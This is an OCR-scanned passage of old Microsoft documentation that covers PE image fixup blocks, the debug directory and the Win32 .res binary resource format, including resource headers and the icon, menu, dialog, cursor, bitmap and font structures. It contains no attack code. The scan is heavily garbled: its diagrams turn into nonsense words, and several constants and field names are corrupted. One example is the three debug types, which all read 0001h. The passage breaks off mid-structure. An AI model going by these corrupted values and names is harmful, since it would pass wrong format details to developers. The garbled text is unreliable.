The Fixup Table contains entries for all fixups in the image. The 
Total Fixup Data Size in the PE Header is the number of bytes in the 
fixup table. The fixup table is broken into blocks of fixups. Each 
block represents the fixups for a 4K page. 

Fixups that are resolved by the linker do not need to be processed by 
the loader, unless the load image can't be loaded at the Image Base 
specified in the PE Header. 

9.1 Fixup Block 

Fixup blocks have the following format: 


VARI ARAIARDA ZIA RARA RAARARZARARAS 


PAGE RVA ù 
Gila Palaia Sola 
3 BLOCK SIZE 3 


sidro alii ii air iii 
3 TYPE/OFFSET 3 


IR aria SURE 


3 TYPE/OFFSET 3 5 
AARAAARAAAARARARARARAAAARAAARAAAAKAAU 
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Figure 20. Fixup Block Format 


To apply a fixup, a delta needs to be calculated. The 32-bit delta 
is the difference between the preferred base, and the base where the 
image is actually loaded. If the image is loaded at its preferred 
base, the delta would be zero, and thus the fixups would not have to 
be applied. Each block must start on a DWORD boundary. The ABSOLUTE 
fixup type can be used to pad a block. 


PAGE RVA = DD Page RVA. The image base plus the page rva is added to 
each offset to create the virtual address of where the fixup needs to 
be applied. 


BLOCK SIZE = DD Number of bytes in the fixup block. This includes the 
PAGE RVA and SIZE fields. 


TYPE/OFFSET is defined as: 


1 1 (0) 
5 1 
UAAAADAAAAAAAAAAAA<, 
3TYPE® OFFSET 3 
AAAAADAAAAAAAAAAAAU 
Figure 21. Fixup Record Format 


TYPE = 4-bit fixup type. This value has the following definitions: 
o Oh ABSOLUTE. This is a NOP. The fixup is skipped. 


o ih HIGH. Add the high 16-bits of the delta to the 16-bit field 
at Offset. The 16-bit field represents the high value of a 32- 
bit word. 


o 2h LOW. Add the low 16-bits of the delta to the 16-bit field 
at Offset. The 16-bit field represents the low half value of a 
32-bit word. This fixup will only be emitted for a RISC machine 
when the image Object Align isn't the default of 64K. 


o 3h __HIGHLOW. Apply the 32-bit delta to the 32-bit field at 
Offset. 


o 4h __HIGHADJUST. This fixup requires a full 32-bit value. The 
high 16-bits is located at Offset, and the low 16-bits is 
located in the next Offset array element (this array element is 
included in the SIZE field). The two need to be combined into a 
signed variable. Add the 32-bit delta. Then add 0x8000 and 
store the high 16-bits of the signed variable to the 16-bit 
field at Offset. 


o 5h __MIPSJIMPADDR. 


All other values are reserved. 


10. Debug Information 

The debug information is defined by the debugger and is not 
controlled by the portable EXE format or linker. The only data 
defined by the portable EXE format is the Debug Directory Table. 
10.1 Debug Directory 


Pagina 482 di 991 


The debug directory table consists of one or more entries that have 
the following format: 


UAAAAAAARAAAAAAAAAKAAAAAAAAAKAAAAAAAAAA, 


3 DEBUG FLAGS 3 
3 TIME/DATE STAMP 3 


3. MAJOR VERSION 3 MINOR VERSION 3 


Sfiiioia i I onda 
Sera ie DAI o 
ai Ln 
o RA - 


Aria i ii. AAAARAAKARARÙ 
Figure 22. Debug Directory Entry 

DEBUG FLAGS = DD Set to zero for now. 

TIME/DATE STAMP = DD Time/Date the debug data was created. 


MAJOR/MINOR VERSION = DW Version stamp. 
This stamp can be used to determine the version of the debug data. 


DEBUG TYPE = DD Format type. 
To support multiple debuggers, this field determines the format of 
the debug information. This value has the following definitions: 

o 0001h Image contains COFF symbolics. 

o ©0001h Image contains CodeView symbolics. 

o 0001h Image contains FPO symbolics. 
DATA SIZE = DD The number of bytes in the debug data. This is the 
size of the actual debug data and does not include the debug 


directory. 


DATA RVA = DD The relative virtual address of the debug data. This 
address is relative to the beginning of the Image Base. 


DATA SEEK = DD The seek value from the beginning of the file to the 
debug data. 


If the image contains more than one type of debug information, then 


the next debug directory will immediately follow the first debug 
directory. 
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Win32 Binary Resource Formats 


Author: 


Preface 


Floyd Rogers 


This document was edited and released by Microsoft Developer 
Support. It describes the binary format of resources in Win32. The 
information is provided at this point because we feel it will make 
the work of application development easier. Unfortunately, the 
information in this document may change before the final release of 
Windows NT. Microsoft is NOT committing to stay with these formats 
by releasing this document. Questions or follow-ups for any of the 
information presented here should be posted to CompuServe MSWIN32 
forum, 


section 4. 
--Steve Firebaugh 
Microsoft Developer Support 
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4.12 Version Resourses 
4.13 Messagetable Resources 
5. Revision History 


1. Overview 


This document details the structure of the resource binary file 
(.res) format for the Windows 32 API (Windows NT 3.1 and Win32s). 
The structure is similar to the existing Windows 16 (Win 3.0/3.1) 
structure, but supports essential new features such as UNICODE 
strings, version headers, and DWORD alignment. To support these 
changes, the file format written by the resource compiler must be 
changed from that used by Windows 16. 


1.1 Comparison between Windows 3.0/3.1 and Windows 32 


The Windows 16 resource file is a file containing one or more binary 
resources. Each resource is preceded by a variable length structure 
containing: Type, Name, Flags, Size. The Type and Name fields are 
either a string identifying the Type or Name, or a WORD value 
specifying the ordinal identity of the resource. The Flags field 
specifies to the system how to load into memory the resource, and the 
size specifies the size in bytes of the resource. The size, 
therefore, points to the next resource in the file. 


The Windows 32 (both NT and Win32s) resource file retains this 
structure, while expanding the header information with several 
additional values. It also adds a few fields to some of the pre- 
defined resources (Menu and Dialog, for instance), aligns all fields 
within the predefined resources on WORD or DWORD boundaries, and adds 
UNICODE (16-bit character) support to the data structures. 


One additional difference in resource files for Windows 32 is worth 
noting. This does not directly affect the structure of the resource 
file, but is rather a difference in how resource files are handled 
and incorporated into an executable image (dll or exe). Windows NT 
uses COFF format objects. Because of this, and the fact that the 
Windows 32 exe format is much different than the Windows 16 format, 
the SDK provides a utility named CVTRES that converts a resource file 
into a COFF object. The linker then incorporates this object 
directly into the resulting executable image. No provision is made 
(as in Windows 16) for running the second pass of the resource 
compiler multiple times to update the resources: relinking the image 
is required. 


However, the Windows 32 API provides a set of APIs that allow a 
program to enumerate all resources within an executable image, and 
update individual resources in the image. 


1.2 Strings in UNICODE 


All strings in a resource file are now stored in UNICODE format. In 
this format, all characters are represented by a 16-bit (WORD) value. 
The first 128 characters are identical to the 128 characters in the 
Windows ANSI character set (although the characters are represented 
by 16 bits each rather than 8bits). The characters in positions 160- 
254 are similar to the characters in the standard Windows character 
set (note that the characters 128-159 are illegal Unicode 
codepoints). This means that they are terminated with a UNICODE_NULL 
symbol rather than a single NULL. The resource compiler translates 
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all normal ASCII strings into UNICODE by calling the 
MultiByteToWwideChar function provided by the Windows API. All 
escaped characters are stored directly, and are assumed to be valid 
UNICODE characters for the resource. If these strings are read in 
later by an application as ASCII (for instance, by calling the 
LoadString api), they will be converted back from UNICODE to ASCII 
transparently by the loader. 


The only exception to the rule is strings in RCDATA statements. 

These psuedo-strings are not real strings, but merely a convenient 
notation for a collection of bytes. Users may overlay a structure 
over the data from an RCDATA statement, and expect certain data to be 
at certain offsets. If a psuedo-string gets automatically changed 
into a UNICODE string, it things would inadvertently change the 
offsets of things in the structure and break those applications. 
Hence, these psuedo-strings must be left as ASCII bytes. To specify 
a UNICODE string inside an RCDATA statement, the user should use the 
explicit L-quoted string. 


1.3 DWORD Alignment 


To make resource binary files easier to read under Windows 32, all 
objects within the file are to be DWORD aligned. This includes 
headers, as well as data entries. This does not usually entail 
changes in the order of the fields of resource data structures, but 
does entail the need for some padding between fields. 


The single exception to this rule is the font and fontdir structures. 
The reason for the exception is that these two structures are copied 
directly from other files, and are not used by RC. 


2. General information 


The resource file is created by the resource compiler (RC) while 
parsing the resource script file (.RC) and including any other 
resource data files (eg. .ICO, .CUR, .BMP, .FNT). The resource file 
contains all information necessary to build the resource table in the 
executable image. The main purpose of the resource file is to speed 
the edit-compile-link cycle by not always forcing resource to be 
recompiled. 


There are currently about a dozen pre-defined resource types. These 
include Menus, Dialogs, Accelerators, Strings, Icons, Cursors, 
Bitmaps, Fonts and Version. These resources are used by the Windows 
system to define the appearance of the application window. The 
resource script allows the application writer to represent these 
features in an easily editable form. Other type ranges are reserved 
for use by the application for application-specific data. No attempt 
is made by the resource compiler to modify this user-defined data 
from 16-bit to 32-bit format. 


The executable image file for Windows 32 is not a Segmented image. 

In the 16-bhit executable image file, each resource was placed into a 
separate segment in the image file. The Windows 32 image file places 
all resources into a single Object or section. The Windows 32 image 
file also provides a binary-sorted resource table that allows fast 
lookup of a particular resource, rather than a table that must be 
searched linearly, as in the 16-bit image file. Because this Windows 
32 image file format is more complex that the Windows 16 format, 
making it harder to update directly, the Windows 32 API provides 
methods of modifying the resource data directly. 


The CVTRES conversion utility that converts the resource file into a 
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COFF object creates the resource table. This table contains three 
directories, indexed by Type, Name and Language, in that order. The 
Type and Name directories consist of two parts: the part dedicated 
to resources whose types or names are represented by strings, an 
those represented by ordinal WORD values. Because the use of strings 
as resource type and name identifiers takes considerably more room 
than ordinal identifiers, Microsoft recommends that they not be used. 


Note that, as all strings in a resource file (including the strings 
used to identify the type and name of resources) are UNICODE, the 
corresponding strings in the program that are being passed to 
LoadBitmap, etc., must also be UNICODE (only if the application is 
using the UNICODE set of apis rather than the ASCII set). This is 
facilitated by use of the TEXT macro provided in winnt.h. 

The third level, language, provides the capability for the 
application developer to ship a single executable image that supports 
more than one language. For instance, one image providing French, 
French-Canadian and French-Belgium could be easily shipped in one 
image file. An application could also be shipped with support for 
all languages supported by the UNICODE standard, although this would 
make the image prohibitively large. However, since the system 
provides facilities to modify the resources within an image, a setup 
program could customize the application's image file for each 
specific user, eliminating unneeded language support to save space in 
the image file. 

2.1 New statements 


Several new statements have been added that the Windows 32 resource 
compiler processes. 


2.1.1 New Button statements. 

These statements allow the application developer the same freedom of 
expression that the PUSHBUTTON, DEFPUSHBUTTON, etc., statements do, 
and correspond to the appropriate button style. 

They all have syntax identical to that of PUSHBUTTON, etc. 

2.1.1.1 AUTOSSTATE 

Allows declaration of an AUTOSSTATE button. 

2.1.1.2 AUTOCHECKBOX 

Allows declaration of an AUTOCHECKBOX button. 

2.1.1.3 AUTORADIOBUTTON 

Allows declaration of an AUTORADIOBUTTON button. 

2.1.1.5 PUSHBOX 

Allows declaration of a PUSHBOX button. 


2.1.1.6 STATE3 


Allows declaration of a SSTATE button (the 3 is at the end for syntax 
purposes). 


2.1.1.7 USERBUTTON 
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Allows declaration of a USERBUTTON user-defined button. 
2.1.2 EXSTYLE statement 


This statement allows the application developer to designate one of 
the extended (WS_EX_xxx) styles for a dialog or control window. 
There are three methods, depending upon what is needed. 


It may be placed just below the DIALOG statement to apply to the 
dialog window (like the CAPTION or STYLE statements). 


EXSTYLE <flags> 
It may be placed on the DIALOG statement with the memory flags. 
FOOBAR DIALOG [MemFlags...] [EXSTYLE=<flags>] x, y, dx, dy 


It may also be placed on the individual CONTROL, PUSHBUTTON, LTEXT, 
etc. statements at the end of the statement. 


AUTOCHECKBOX "autocheckbox", id, x, y, dx, dy 
[styleflags][exstyleflags] 


2.1.3 CHARACTERISTICS statement 


This statement allows the application developer to specify 
information about the resource that may be of use to tools that read 
and write resource files. It has no significance to the system and 
is not stored in the image file. 


CHARACTERISTICS <user defined DWORD value> 
2.1.4 VERSION statement 


This statement is intended to allow the application to specify a 
version number of the resource in the resource file (for those tools 
that read and write resource files.) It has no significance to the 
system and is not stored in the image file. 


VERSION <user defined DWORD value> 
2.1.5 LANGUAGE statement 


The LANGUAGE statement is used to specify the language the resource 
file, or section of resource file, is written in. It may be placed 
anywhere within the resource script file that a single-line statement 
(such as ICON, CURSOR, BITMAP) may be placed. The scope of the 
language specified by a LANGUAGE statement is from that point in the 
script file to the next LANGUAGE statement, or the end of the file. 


LANGUAGE <majornumber>,<minornumber> 


where <majornumber> represents the language id, and <minornumber> the 
sub-language identifiers. The values specified in winnt.h should be 
used. 


The LANGUAGE statement may also be placed before the BEGIN statement 
for MENU, DIALOG, STRINGTABLE, ACCELERATOR and RCDATA resources, 
along with other optional statements like CAPTION, STYLE, etc. If 
the statement is placed here, it's scope is limited to the resource 
being defined. 


2.1.6 MESSAGETABLE statement 
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The MESSAGETABLE statement is used to include a message table. A 
message table is a special-purpose string table that is used to 
contain error or informational messages, and may contain formatting 
information. The format is: 


<nameid> MESSAGETABLE <filename> 
2.1.7 Additional syntax for UNICODE strings. 


Quoted strings in the resource script are treated as ASCII strings 
(in the current codepage) unless preceeded by a "L" or "1" character, 
eg: 

L'This is a Unicode string" 
Declaring a string UNICODE with this syntax has two effects. Ina 
RCDATA statement, this causes the compiler to store the string as 
UNICODE rather than ASCII. In all cases using this syntax, escapes 
embedded within the string become UNICODE codepoint escapes resulting 
in a 16-bit UNICODE character, eg: 

L'"This is the first line,\x2028and this is the second" 
where the 0x2028 UNICODE character is the Line Separator character. 
Any UNICODE character may be embedded within any resource script 
string in this manner. 


3. Resource Header Format 


The general format of the entire file is simply a number of resource 
file entries concatenated together. Each resource contains the 
information about a single resource, such as a dialog or a string 
table. 


Each entry consists of a resource header followed by the data for 
that resource. A resource header (which is DWORD aligned) is 
composed of four elements: two dwords containing the size of the 
header and the size of the resource data, the resource type, the 
resource name, and additional resource information. The data for the 
resource follows the resource header and is specific to each 
particular type of resource. 


3.1 DataSize 


This field gives the size of the data that follows the header, not 
including any file padding between this resource and any resource 
that follows this resource in the resource file. 


3.2 HeaderSize 


The HeaderSize field gives the size of the resource header structure 
that follows. 


3.3 Type 


The type field can either be a number or a null-terminated UNICODE 
string specifying the name of the type. This variable kind of type 
is known as a “Name or Ordinal' field, and is used in most places in 
a resource file where an ID may appear. 


The first WORD of a Name or Ordinal field identifies whether the 
field is a number or a string. If the first WORD is Oxffff (an 
invalid UNICODE character), then the following WORD of information is 
the type number. Otherwise, the field is specified by a UNICODE 
string. 
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If the type field is a number, then the number specifies a standard 
or user-defined resource type. All standard Windows resource types 
have been assigned numbers, which are listed below. This list is 
taken from the header file used to make RC and contains the type 
number of the various resource types: 


/* Predefined resource types */ 
#define RT_NEWRESOURCE 0x2000 
#define RT_ERROR Ox7fff 
#define RT_CURSOR 1 
#define RT_BITMAP 2 
#define RT_ICON 3 
#define RT_MENU 4 
#define RT_DIALOG 5 
#define RT_STRING 6 
#define RT_FONTDIR 7 
#define RT_FONT 8 
#define RT_ACCELERATORS 9 


#define RT_RCDATA 10 

#define RT_MESSAGETABLE 11 

#define RT_GROUP_CURSOR 12 

#define RT_GROUP_ICON 14 

#define RT_VERSION 16 

#define RT_NEWBITMAP (RT_BITMAP|RT_NEWRESOURCE) 
#define RT_NEWMENU (RT_MENU|RT_NEWRESOURCE) 
#define RT_NEWDIALOG (RT_DIALOG|RT_NEWRESOURCE) 


If the type field is a string, then the type is a user-defined type. 
3.4 Names 


A name identifies the particular resource. A name (like a type) may 
be a number or a string, and they are distinguished in the same way 
as numbers and strings are distinguished in the type field. 


Note that no padding (for DWORD alignment) is needed between the Type 
and Name fields, as they contain only WORD data and hence the Name 
field will always be properly aligned. However, there may need to be 
a WORD of padding after the Name field to align the rest of the 
header on DWORD boundaries. 


3.5 Additional Header Information 

The additional information contains more information about the 
particular resource data, including size and language ID. The 
structure of the Header, plus it's additional information is as 
follows: 


struct tagResource { 


DWORD DataSize; // size of data without header 
DWORD HeaderSize; // Length of the additional header 
[Ordinal or name TYPE] // type identifier, id or string 
[Ordinal or name NAME] // name identifier, id or string 
DWORD DataVversion; // predefined resource data version 
WORD MemoryFlags; // state of the resource 

WORD LanguageId; // UNICODE support for NLS 

DWORD Version; // Version of the resource data 
DWORD Characteristics; // Characteristics of the data 

Pe 


The additional information structure will always begin on a DWORD 
boundary within the resource file, which may require adding some 
padding in between the name field and the ResAdditional structure. 
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3.5.1 Dataversion 


The DataVversion field determines the format of the information 
within the resource header that follows. This may be used in the 
future to allow additional information to be entered into the 
predefined formats. 


3.5.2 MemoryFlags 


The field wMemoryFlags contains flags telling the state of a given 
resource. These attributes are given to a given resource by 
modifiers in the .RC script. The script identifiers inject the 
following flag values: 


#define MOVEABLE Ox0010 
#define FIXED -MOVEABLE 
#define PURE 0x0020 
#define IMPURE —PURE 
#define PRELOAD 0x0040 
#define LOADONCALL -PRELOAD 
#define DISCARDABLE 0x1000 


The resource compiler for NT always ignores the setting of the 
MOVEABLE, IMPURE, and PRELOAD flags. 


3.5.3 LanguageId 


The language ID is included in each resource to specify the language 
that the strings are written with when they need to be translated 
back to a single byte strings. As well, there may be multiple 
resources of exactly the same type and name which differ in only the 
language of the strings within the resources. 


The language IDs are documented in Appendix A of the NLS 
specification, or in winnt.h. The language of a resource or set of 
resources is specified by the LANGUAGE statement. 


3.5.4 Version and Characteristics 


Currently, there is space in the resource file format for version and 
characteristic information of the resource. These values can be set 
by the resource compiler by using the VERSION or CHARACTERISTICS 
statements. 


3.6 Differentiating 16 and 32-bit resource files. 

Because it might be desirable for an ISV's tool that reads and writes 
resource files to be able to read either the older Windows 16 format 
files and the new Windows 32 format, Microsoft has devised a method 
to do this using illegal type and name ordinal numbers. 


The method involved is to place an illegal resource in the resource 
file. The following eight bytes were chosen: 


OX00 Ox00 OXx00 Ox00 Ox20 OXx00 Ox00 Ox00 
Assume that it is a 16-bit file. In that case, the Type is illegal 
since the first 0x00 says string, but a zero-length string is an 
illegal string. This, then is an illegal 16-bit resource header, 
indicating that the file is a 32-bit file. 


Assume that it is a 32-bit file. Given that, the size of the data is 
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zero, which surely will never be the case. 


The Windows 32 resource compiler prefaces each 32-bit resource file 
with this string of data (followed by an additional data structure 
describing a zero-length resource with © ordinal type and 0 ordinal 
name), allowing differentiation of 16 and 32-bit resource files. Any 
tools reading resource files should ignore this resource. 


3.7 File Alignment. 


Because it is sometimes useful to separate resources into several 
scripts and then concatenate them after compiling the resource files 
separately, it is necessary to specify that resource files are padded 
to a dword size. If this padding were not included, it could result 
in the first resource of the second and/or subsequent resource files 
not aligning upon a dword boundary. 


4. Resource Data Format 

For any of the pre-defined data types, all structures are DWORD 
aligned, including the bitmap, icon, and font header structures. AS 
well, the data will always begin on a DWORD boundary. 

4.1 Version Resources 

Version resources are used to record the version of the application 
using the resource file. Version resources contain a fixed amount of 


information. The structure of the version resource is as follows: 


typedef struct tagvS_FIXEDFILEINFO { 


DWORD dwSignature; // e.g. 0Oxfeef04bd 

DWORD dwStrucVersion; // e.g. 0x00000042 = "0.42" 
DWORD dwFileVersionMs; // e.g. 0x00030075 = "3.75" 
DWORD dwFileVersionLS; // e.g. 0x00000031 = "0.31" 
DWORD dwProductVersionMS; // e.g. 0x00030010 = "3.10" 
DWORD dwProductVersionLS; // e.g. 0x00000031 = "0.31" 
DWORD dwFileFlagsMask; // = 0x3F for version "0.42" 
DWORD dwFileFlags; // ®@.9. VFF_DEBUG | VFF_PRERELEASE 
DWORD dwFile0S; // ®è.g9. VOS_DOS_WINDOWS16 
DWORD dwFileType; // €è.9. VFET_DRIVER 

DWORD dwFileSubtype; // €è.g9. VFT2_DRV_KEYBOARD 
DWORD dwFileDateMS; // e.g. 0 

DWORD dwFileDateLS; // e.g. 0 


} VS_FIXEDFILEINFO; 
4.2 Icon Resources 


The ICON statement in the .RC script does not create a single 
resource object, but creates a group of resources. This allows 
Windows programs a degree of device-independence through the use of 
different pixel bitmaps on hardware configurations with differing 
capabilities. Icons, most often designed for differing numbers of 
pixel planes and pixel counts, are grouped and treated by Windows as 
a single resource. In the .RES and .EXE files, however, they are 
stored as a group of resources. These groups are stored in a .RES 
file with the components first (in this case the different icons 
[type 3]) and a group header following (Type 14). The group header 
contains the information necessary to allow Windows to select the 
proper icon to display. 


The components have the following structure: 
[Resource header (type = 3)] 
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[DIB Header] 
[Color DIBits of icon XOR mask] 
[Monochrome DIBits of AND mask] 


Each component is given an ordinal ID that is unique from all other 
icon components. 


The Device Independent Bitmap (DIB) header's fields represent the 
masks' information separately with two exceptions. First, the height 
field represents both the XOR and AND masks. Before converting the 
two DIBs to Device Dependent Bitmaps (DDB), the height should be 
divided by two. The masks are always the same size and are one-half 
the size given in the DIB header. Second, the number of bits per 
pixel and bit count refer to the XOR mask. The AND mask is always 
monochrome and should be interpreted as having one plane and one bit 
per pixel. Before using an icon with Windows refer to the SDK 
reference materials for more information on DIBs. Since the format 
of an icon component closely resembles the format of the .ICO file, 
the documentation in section 9.2 of the Windows SDK Reference is 
useful. DDBs should not be used for Windows 32 applications. 


The group header is described here: 
[Resource header (type = 14)] 


struct IconHeader { 


WORD wReserved; // Currently zero 

WORD wType; // 1 for icons 

WORD wCount; // Number of components 

WORD padding; // filler for DWORD alignment 
}; 


The next portion is repeated for each component resource: 


struct ResourceDirectory { 
BYTE bWidth; 
BYTE bHeight; 
BYTE bColorCount; 
BYTE bReserved; 
WORD wPlanes; 
WORD wBitCount; 
DWORD 1BytesInRes; 


WORD wNameOrdinal; // Points to component 
WORD padding; // filler for DWORD alignment 
}; 


Notice that the group header consists of a fixed header and data that 
repeats for each group component. Both of these parts are fixed 
length allowing for random access of the group component information. 


This group header contains all of the data from the .ICO header and 
from the individual resource descriptors. 


4.3 Menu Resources 
Menu resources are composed of a menu header followed by a sequential 
list of menu items. There are two types of menu items: popups and 
normal menu items. The MENUITEM SEPARATOR is a special case of a 
normal menu item with an empty name, zero ID, and zero flags. The 
format for these types is shown here: 

[Resource header (type = 4)] 
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struct MenuHeader { 


WORD wVersion; // Currently zero 
WORD cbHeaderSize; // Also zero 
}i 


These next items are repeated for every menu item. 
Popup menu items (signalled by fItemFlags & POPUP): 


struct PopupMenuItem { 
WORD fItemFlags; 
WCHAR szItemText[]; 


}; 
Normal menu items (signalled by !(fItemFlags & POPUP)): 


struct NormalMenuItem { 
WORD fItemFlags; 
WORD wMenuID; 
WCHAR szItemText[]; 


ti 


The wversion and cbHeaderSize structure members identify the version 
of the menu template. They are both zero for Windows 3.0 but may be 
incremented with future changes to the menu template. 


The WORD fItemFlags is a set of flags describing the menu item. If 
the POPUP bit is set, the item is a POPUP. Otherwise, it is a normal 
menu component. There are several other flag bits that may be set. 
Their values are as follows: 


#define GRAYED Ox0001 // 'GRAYED' keyword 
#define INACTIVE 0x0002 // *INACTIVE' keyword 
#define BITMAP 0x0004 // ‘BITMAP' keyword 
#define OWNERDRAW 0x0100 = // 'OWNERDRAW' keyword 
#define CHECKED 0x0008 // 'CHECKED' keyword 
#define POPUP Ox0010 // Used internally 
#define MENUBARBREAK — 0x0020 // 'MENUBARBREAK' keyword 
#define MENUBREAK 0x0040 // 'MENUBREAK' keyword 
#define ENDMENU 0x0080 // Used internally 


The fItemFlags portion of the last menu item in a given POPUP is 
flagged by OR'ing it with ENDMENU. It is important to note that 
since popups can be nested, there may be multiple levels of items 
with ENDMENU set. when menus are nested, the items are inserted 
sequentially. A program can traverse this hierarchy by checking for 
the item with the ENDMENU flag set. 


4.4 Dialog Box Resources 

A dialog box is contained in a single resource and has a header and a 
portion repeated for each control in the dialog box. The header is 
as follows: 


[Resource header (type = 5)] 


struct DialogBoxHeader { 
DWORD 1Style; 


DWORD lExtendedstyle; // new for NT 
WORD NumberOfItems; 

WORD Xx; 

WORD Vi 
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WORD CX; 

WORD CY; 

[Name or Ordinal] MenuName; 
[Name or Ordinal] ClassName; 
WCHAR szCaption[]; 


WORD wPointSize; // Only here if FONT set for dialog 
WCHAR szFontName[]; // This too 
}; 
The item DWORD 1Style is a standard window style composed of flags 
found in WINDOWS.H. The default style for a dialog box is: 


WS_POPUP | WS_BORDER | WS_SYSMENU 


The lExtendedStyle DWORD is used to specify the extended window style 
flags. If an extended style is specified on the DIALOG statement, or 
with the other optional modifier statements, this DWORD is set to 
that value. 


The items marked °Name or Ordinal' are the same format used 
throughout the resource file (most notably in each resource header) 
to store a name or an ordinal ID. As before, if the first byte is an 
Oxffff, the next two bytes contain an ordinal ID. Otherwise, the 
first 1 or more WORDS contain a null-terminated string. An empty 
string is represented by a single WORD zero in the first location. 


The WORD wPointSize and WCHAR szFontName entries are present if the 
FONT statement was included for the dialog box. This can be detected 
by checking the entry l1Style. if l1Style & DS_SETFONT (DS_SETFONT = 
0x40), then these entries will be present. 


The data for each control starts on a DWORD boundary (which may 
require some padding from the previous control), and its format is as 
follows: 


struct ControlData { 
DWORD 1Style; 
DWORD lExtendedStyle; 


WORD Xj 
WORD Vj 
WORD CX; 
WORD CY; 
WORD wId; 


[Name or Ordinal] ClassId; 
[Name or Ordinal] Text; 
WORD nExtraStuff; 


ti 


As before, the item DWORD lStyle is a standard window style composed 
of the flags found in WINDOWS.H. The type of control is determined 
by the class. The class is either given by a zero-terminated string, 
or in the case of many common Windows classes, is given a one word 
code to save space and speed processing. Because UNICODE allows 
0x8000 as a legal character, the ordinal classes are prefaced with a 
of OxFFFF, similar to the ordinal Type and Name fields. The one word 
classes are listed here: 


#define BUTTON 0x8000 
#define EDIT 0x8100 
#define STATIC 0x8200 
#define LISTBOX 0x8300 
#define SCROLLBAR 0x8400 
#define COMBOBOX 0x8500 
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The lExtendedStyle DWORD is used to specify the extended style flags 
to be used for this control. The extended style flags are placed at 
the end of the CONTROL (or other control statements) statement 
following the coordinates 


The extra information at the end of the control data structure is 
currently not used, but is intended for extra information that may be 
needed for menu items in the future. Usually it is zero length. 


The various statements used in a dialog script are all mapped to 
these classes along with certain modifying styles. The values for 
these styles can be found in WINDOWS.H. All dialog controls have the 
default styles of WS_CHILD and WS_VISIBLE. A list of the default 
styles used to make the script statements follows: 


Statement Default Class Default Styles 

CONTROL None WS_CHILD|WS_VISIBLE 

LTEXT STATIC ES_LEFT 

RTEXT STATIC ES_RIGHT 

CTEXT STATIC ES_CENTER 

LISTBOX LISTBOX WS_BORDER | LBS_NOTIFY 
CHECKBOX BUTTON BS_CHECKBOX | WS_TABSTOP 
PUSHBUTTON BUTTON BS_PUSHBUTTON | WS_TABSTOP 
GROUPBOX BUTTON BS_GROUPBOX 

DEFPUSHBUTTON BUTTON BS_DEFPUSHBUTTON | WS_TABSTOP 
RADIOBUTTON BUTTON BS_RADIOBUTTON 

AUTOCHECKBOX BUTTON BS_AUTOCHECKBOX 

AUTO3STATE BUTTON BS_AUTOSSTATE 
AUTORADIOBUTTON BUTTON BS_AUTORADIOBUTTON 

PUSHBOX BUTTON BS_PUSHBOX 

STATE3 BUTTON BS_3STATE 

EDITTEXT EDIT ES_LEFT|WS_BORDER]|WS_TABSTOP 
COMBOBOX COMBOBOX None 

ICON STATIC SS_ICON 

SCROLLBAR SCROLLBAR None 


The control text is stored in the Name or Ordinal' format described 
in detail above. 


4.5 Cursor Resources 
Cursor resources are very much like icon resources. They are formed 
in groups with the components preceding the header. This header also 
employs a fixed-length component index that allows random access of 
the individual components. The structure of the cursor header is as 
follows: 

[Resource header (type = 12)] 


struct CursorHeader { 


WORD wReserved; // Currently zero 

WORD wType; // 2 for cursors 

WORD cwCount; // Number of components 

WORD padding; // filler for DWORD alignment 
}i 


The next portion is repeated for each component resource, and starts 
on a DWORD boundary. 


struct ResourceDirectory { 
WORD wwidth; 
WORD wHeight; 
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WORD wPlanes; 
WORD wBitCount; 
DWORD 1BytesInRes; 


WORD wNameOrdinal; // Points to component 
WORD padding; // filler for DWORD alignment 
}; 


Each cursor component is also similar to each icon component. There 
is, however, one significant difference between the two:  cursors 
have the concept of a ‘hotspot' where icons do not. Here is the 
component structure: 


[Resource header (Type = 1)] 


struct CursorComponent { 
short xHotspot; 
short vyHotspot; 


[Monochrome xOR mask] 
[Monochrome AND mask] 


These masks are bitmaps copied from the .CUR file. The main 
difference from icons in this regard is that cursors do not have 
color DIBs used for XOR masks like cursors. Although the bitmaps are 
monochrome and do not have DIB headers or color tables, the bits are 
still in DIB format with respect to alignment and direction. See the 
SDK Reference for more information on DIB formats. 


4.6 Bitmap Resources 


Windows 32 can read two types of device-independent bitmaps. The 
normal type of DIB is the Windows 3.0 DIB format. The other type of 
DIB is that used for 08/2 versions 1.1 and 1.2. The bitmap resource 
consists of a single device-independent bitmap and accordingly, this 
DIB can be of either format. The two DIBs are distinguished by their 
header structures. They both have the size of their respective 
structures as the first DWORD in the header. Both these structures 
are documented in the Windows SDK Reference Version 3.0 volume 2, 
section 7. The header structure for the normal DIB is 
BITMAPINFOHEADER while the 0S/2 DIB header is called 
BITMAPCOREHEADER. The correct size (as a DWORD) must be in the first 
entry of the structure. 


[Normal resource header (type = 2)] 


[BITMAPINFOHEADER or BITMAPCOREHEADER] 
[Color table if not 24 bits per pixel] 
[Packed-pixel bitmap] 


Note that the color table is optional. All but 24 bit color bitmaps 
have a color table attached next. This table's length can be 
computed by 2#BitsPerPixel * 3 bytes for 0S/2 bitmaps or 
2#BitsPerPixel * 4 bytes for Windows bitmaps. The bitmap image data 
is placed immediately following the color table. 


Note that the bitmap file has an unaligned header structure 
(BITMAPFILEHEADER structure). This header is not, however, stored in 
the resource file, as it serves only to identify the type of file 
(DIB or DDB). 

4.7 Font and Font Directory Resources 


Font resources are different from the other types of resources in 
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that they are not added to the resources of a specific application 
program. Font resources are added to .EXE files that are renamed to 
be .FON files. These files are libraries as opposed to applications. 


Font resources use a resource group structure. Individual fonts are 
the components of a font group. Each component is defined by a FONT 
statement in the .RC file. The group header follows all components 
and contains all information necessary to access a specific font. 
The format of a font component resource is as follows: 


[Normal resource header (type = 8)] 


[Complete contents of the .FNT file follow as the resource body - 
- See the Windows SDK Reference for the format of the .FNT file] 


The group header for the fonts is normally last in the .RES file. 
Note that unlike cursor and icon groups, the font group need not be 
contiguous in the .RES file. Font declarations may be placed in the 
.RC file mixed with other resource declarations. The group header is 
added automatically by RC at the end of the .RES file. Programs 
generating .RES files must add the FONTDIR entry manually. The group 
header has the following structure: 


[Normal resource header (type = 7)] 
WORD NumberOfFonts; // Total number in .RES file 


The remaining data is repeated for every font in the .RES file. 


WORD fontoOrdinal; 

struct FontDirEntry { 
WORD dfVersion; 
DWORD dfSize; 
char dfCopyright[60]; 
WORD dfType; 
WORD dfPoints; 
WORD dfVertRes; 
WORD dfHorizRes; 
WORD dfAscent; 
WORD dfInternalLeading; 
WORD dfExternalLeading; 
BYTE dfItalic; 
BYTE dfUnderline; 
BYTE dfstrike0Out; 
WORD dfWeight; 
BYTE dfCharSet; 
WORD dfPixWidth; 
WORD dfPixHeight; 
BYTE dfPitchAndFamily; 
WORD dfAvgwidth; 
